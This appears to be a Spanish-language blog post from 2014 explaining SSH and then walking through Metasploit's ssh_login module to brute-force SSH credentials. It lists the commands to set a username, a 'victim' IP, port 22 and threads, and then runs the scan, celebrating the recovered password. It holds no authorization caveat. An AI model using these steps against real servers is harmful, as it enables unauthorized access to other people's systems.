Archivo del Blog

lunes, 3 de marzo de 2014

Usando módulo auxiliary SSH(SECURE SHELL) mediante metasploit [2]PARTE y última parte

Hola amigos y lectores en este post les vengo a explicar como usar el módulo auxiliary "ssh_login", bueno pero como he visto en el anterior post no explice que era una conexión SSH(SECURE SHELL), bueno venga y se los explico.

¿Que es una conexión SSH?

SSH por su palabra lo dice en español (Shell Seguro) es una de la muchas plataformas que nos permiten conectarnos desde un sistema operativo GNU/LINUX desde windows, pero para esto necesitariamos la herramienta PuTTY. "PuTTY" es una de las herramientas que nos permiten conectarnos a los sistemas operativos GNU/LINUX, ojo pero para esto necesitariamos que tengamos la conexión SSH activada, algunos Sistemas Operativos GNU/LINUX tendrían ya la herramienta instalada e incrustada algunos no y tendrían que instalarla, bueno vamos a ello, de nuevo como les escribi antes usare mi máquina virtual BackTrack 5 R3, lo primero tendriamos que abrir la consola "Metasploit Framework" para comenzar a utilizar este scanner auxiliary, entonces colocaríamos "msfconsole" sin las comillas y daríamos enter, okey y después que se nos habra abierto la consola colocaríamos "search ssh_login" sin las comillas y nos aparecerán los siguientes módulos, ante de todo también esta herramienta se basa en brute force que en español significa "FUERZA BRUTA", fuerza bruta se basa en buscar en distintos diccionarios las contraseñas como en ocasiones de fuerza bruta a conexiones WPA/WEP, es muy peligroso la fuerza bruta por que en algunas conexiones no todas pueden haber archivos importantes, como classificaciones escolares,fotos,etc.


Foto:



Como verán yo tengo desactualizado metasploit pero para los que estarán viendo este post tendrían mas módulos, bueno entonces utilizariamos el módulo "auxiliary/scanner/ssh/ssh_login" y colocaríamos lo siguiente.

use auxiliary/scanner/ssh/ssh_login
show options -> show options es para ver las opciones que tendríamos que elegir.

Foto:



Bueno entonces elegiriamos las siguientes opciones no todas.

set USERNAME
set STOP_ON_SUCCESS
set RHOSTS
set RPORT
set THREADS
exploit

okey entonces pondriamos así.

set USERNAME informix <- nombre de la máquina OS GNU/LINUX
set STOP_ON_SUCCESS true <-  es necesario poner true(verdadero) para que nos funcione el proceso
set RHOSTS ipvictima <- Colocaríamos la Ip de nuestra victima osea el OS(SISTEMA OPERATIVO)
set RPORT 22 <- es obvio que los sistema SSH/SECURE SHELL tiene el puerto 22 abierto
set THREADS 100 <- número de veces por segundos
exploit <- lanzamiento del scanner a funcionar osea "explotar"

Bueno entonces nos quedaría así.

Foto:


Y como veríamos se nos comenzo a scanner el auxiliary a la conexión SSH/SECURE SHELL/SHELL SEGURA, bueno después que el proceso se haya escaneo nos quedaría así.

Foto:




Y como verán se nos ha lanzado el usuario y password :) !, bueno y como vierón es demasiado fácil utilizar estos scanners auxiliarys, bueno espero que hayan entendido y adíos.

No hay comentarios.:

Publicar un comentario